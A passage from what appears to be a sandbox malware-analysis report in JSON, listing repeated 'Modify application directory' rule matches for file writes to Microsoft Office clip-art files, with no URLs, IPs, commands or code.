"file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43628", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so02431_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02437_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so02437_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43635", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so02437_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02439_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so02439_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43642", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so02439_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02464_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so02464_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43649", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so02464_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02465_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so02465_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43656", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so02465_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02578_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so02578_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43663", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so02578_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02617_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so02617_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43670", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so02617_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02790_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so02790_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43679", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so02790_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02791_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so02791_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43688", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so02791_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02793_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so02793_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43697", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so02793_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02794_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so02794_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43706", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so02794_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02862_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so02862_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43715", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so02862_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02886_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so02886_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43730", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so02886_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02958_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so02958_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43741", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so02958_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPACE_01.MID", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\space_01.mid", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43748", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\space_01.mid\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPRNG_01.MID", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\sprng_01.mid", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43755", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\sprng_01.mid\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\STUBBY1.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\stubby1.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43762", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\stubby1.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\STUBBY2.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\stubby2.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43769", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\stubby2.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SUMER_01.MID", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\sumer_01.mid", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43776", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\sumer_01.mid\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SWEST_01.MID", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\swest_01.mid", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43783", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\swest_01.mid\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY00110_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\sy00110_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43790", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\sy00110_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY00127_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\sy00127_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43797", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\sy00127_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY00132_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\sy00132_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43804", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\sy00132_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY00170_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\sy00170_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43811", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\sy00170_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY00560_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\sy00560_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43818", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\sy00560_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY00642_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\sy00642_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43825", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\sy00642_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY00788_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\sy00788_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43832", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\sy00788_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY00792_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\sy00792_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43839", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\sy00792_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY00795_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\sy00795_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43846", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\sy00795_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY00882_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\sy00882_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43853", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\sy00882_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY01006_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\sy01006_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43860", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\sy01006_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY01252_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\sy01252_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43867", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\sy01252_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY01253_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\sy01253_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43874", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft 